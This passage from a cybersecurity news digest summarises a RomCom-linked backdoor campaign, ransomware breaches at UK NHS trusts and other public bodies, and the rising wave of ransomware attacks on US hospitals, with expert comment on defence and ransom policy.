The backdoor eventually writes ‘security.dll’ to run automatically at reboot for persistence and awaits commands from the C2, which, based on previous reporting, includes data exfiltration, downloading of additional payloads, deleting files or directories, spawning processes with spoofed PID, as well as starting a reverse shell.

The analysed campaign is thought to be either a rebranded RomCom operation or one that includes core members from the old group supporting new threat activity.

Source – https://www.bleepingcomputer.com/news/security/romcom-hackers-target-nato-summit-attendees-in-phishing-attacks/

UK Battles Hacking Wave as Ransomware Gang Claims ‘Biggest Ever’ NHS Breach

The U.K.’s largest NHS trust has confirmed it’s investigating a ransomware incident as the country’s public sector continues to battle a rising wave of cyberattacks.

Barts Health NHS Trust, which runs five London-based hospitals and serves more than 2.5 million patients, was recently added to the dark web leak site of the ALPHV ransomware gang. The gang, also known as BlackCat, says it has stolen 70 terabytes of sensitive data in what it claims is the biggest breach of healthcare data in the United Kingdom.

Samples of the allegedly stolen data include employee identification documents, including passports and driver licenses, and internal emails labeled “confidential.”

This incident is the second breach of NHS data in recent weeks. As first reported by the Independent, a June ransomware attack on the U.K.’s University of Manchester saw hackers access an NHS dataset that holds information on 1.1 million patients across 200 hospitals. The compromised data — gathered by the university for research purposes — includes NHS numbers and the first three letters of patients’ postcodes, according to reports.

The National Cyber Security Centre, the U.K.’s cybersecurity agency, is investigating the incident.

Ofcom, the U.K.’s communications regulator, recently confirmed it was among the organisations to have been compromised by the Clop ransomware gang’s mass-exploitation of a security flaw in Progress Software’s MOVEit Transfer managed file transfer service, and the University of the West of Scotland (UWS) has confirmed that it’s experiencing an “ongoing cyber incident,” but kept light on details.

One of the largest ongoing cyber incidents impacting the U.K. public sector resulted from a May ransomware attack on Capita, a British outsourcing giant that provides critical services for the U.K. government.

As a result of the attack, which was claimed by the Black Basta ransomware group, more than 90 organisations reported breaches of personal information. This included the Universities Superannuation Scheme (USS), the U.K.’s largest private pension provider, which said that the personal details of almost half a million members were held on servers accessed during the breach.

Source – https://techcrunch.com/2023/07/10/uk-hacks-public-sector-nhs-ransomware/


After a Lull, Ransomware Attacks on Hospitals are Rising Again

Earlier this year, cybersecurity experts noted a slight dip in ransomware attacks aimed at health systems, but they also cautioned that the decline may be short-lived.

In recent weeks, more ransomware groups have launched attacks at health systems, and they have disrupted patient care, says John Riggi, national advisor for cybersecurity and risk for the American Hospital Association.

“I have seen, unfortunately, an increase in high-impact ransomware attacks just in the past six weeks, and with multiple facilities being hit,” Riggi stated.

In fact, it’s becoming clear that attacks aimed at hospitals and healthcare organisations are looking to be worse in 2023 than last year.

As of late June, more than 220 cyberattacks have targeted hospitals and health systems, and more than 36 million people have been affected. By comparison, 44 million were affected by hacking incidents in all of 2022.

It’s worth noting that Riggi is focusing solely on cyberattacks aimed by bad actors. The federal government also tracks other unauthorised health data disclosures, such as accidental breaches of information from digital tracking tools on hospital websites.

In the first six months of the year, the data breaches involving two firms – MCNA, a dental insurer, and PharMerica, a pharmacy services firm – affected more than 14 million people. One health system recently was hit with a ransomware attack that disrupted cancer treatment.

A ransomware attack disrupted services at Richmond University Medical Center in New York in May.

A Russia-linked ransomware group, Clop, has claimed responsibility for attacks involving the healthcare industry. Riggi says Clop is “notoriously responsible for large data ransomware attacks recently.”

Some hospitals, including Community Health Systems, have been affected by Clop’s attack on Fortra, a cybersecurity firm that provides secure file transfer software. NationsBenefits Holdings, which provides supplemental benefits, was also affected by the Fortra breach.

Federal officials have also issued warnings about TimisoaraHackerTeam, or THT, a relatively unknown group that has targeted the healthcare industry. The U.S. Department of Health and Human Services issued a June 16 advisory warning, “When its ransomware is deployed, their rarely used and very effective technique of encrypting data in a targeted environment has paralyzed the health and public health (HPH) sector.”

The health department says the group attacked an unnamed U.S. cancer center in June 2023, and the attack “significantly reduced patient treatment capability, rendered digital services unavailable, and also threatened exposure of patient personal health information.”

Many cybercriminals are using Lockbit ransomware in their attacks. Operating on a “ransomware-as-a-service” model, Lockbit allows other gangs and attackers to use its technology to infiltrate hospitals and other organisations. Federal officials issued an advisory in June urging health systems and other critical sectors to take steps to defend their systems against Lockbit ransomware attacks.

Riggi pointed to the growing sophistication of some ransomware gangs, including Clop, which exploited previously unknown vulnerabilities in file transfer systems.

In the past, hackers and cyberattackers have been leery of attacking hospitals, cybersecurity experts have said. But Riggi says some ransomware groups are showing no hesitation in going after health systems, even if they endanger patients.

“These are threat-to-life crimes,” Riggi says. “These are not data crimes. These are not white-collar crimes. And the adversaries have to understand, when we are diverting ambulances with stroke, heart attack and trauma patients, people’s lives are at risk.”

Scripps Health suffered a costly cyberattack in 2021 that disrupted patient services. The attack also affected other hospitals as well, according to a study published by JAMA Network Open.

Stroke patients had to be transferred to other facilities, neighboring hospitals saw higher traffic in their emergency departments, and there was a sharp increase in the number of patients who left the emergency department without being seen.

When hospitals pay a ransom demand in a cyberattack, Riggi says most leaders are doing so to protect the safety of patients. “If a decision is made to pay, it is based on patient safety issues,” Riggi says.

Federal authorities and the American Hospital Association strongly advise hospitals and health systems against paying the ransom.

Authorities say paying ransom demands only encourages criminals to engage in other attacks, and Riggi notes that the payments could be directed to support weapons programs in North Korea or Iran. Cybersecurity experts also say criminals aren’t known for keeping their word and may simply demand more money to return stolen data or restore systems.

More health systems are refusing to pay ransom demands, Riggi says.

“The starting point, the anchor point as they develop policies and procedures and preparedness is: We will not pay. I hear that more and more,” he says.

However, hospitals and health systems need to do everything possible to fortify their defenses to deter attacks. Hospitals also need to develop strong response plans if, and more likely when, they are attacked.

Hospital leaders need to establish cybersecurity as a high priority and a risk issue threatening patient safety, Riggi says. He suggests assigning a governance structure around the risk issue to finance mitigation and recovery efforts.

Riggi says the key is “imbuing this culture of cybersecurity within a healthcare organization, helping the staff first understand that cyber hygiene is as important as medical hygiene to protect the patients.”

Hospitals also need to work with other health systems in their area to develop regional response plans to a cyberattack. If one hospital is disrupted, other neighboring facilities are going to feel the strain and need to be prepared.

“It’s what I call ransomware blast radius,” Riggi says. “The original victim is hit, but there is a collateral effect throughout the entire healthcare region.”

Cyberattacks also carry heavy financial costs. The average healthcare data breach now carries a cost of more than $10 million, according to IBM Security. And those are costs hospitals don’t need when they are facing serious financial difficulties.

Source – https://www.chiefhealthcareexecutive.com/view/after-a-lull-ransomware-attacks-on-hospitals-are-rising-again

Smarttech247
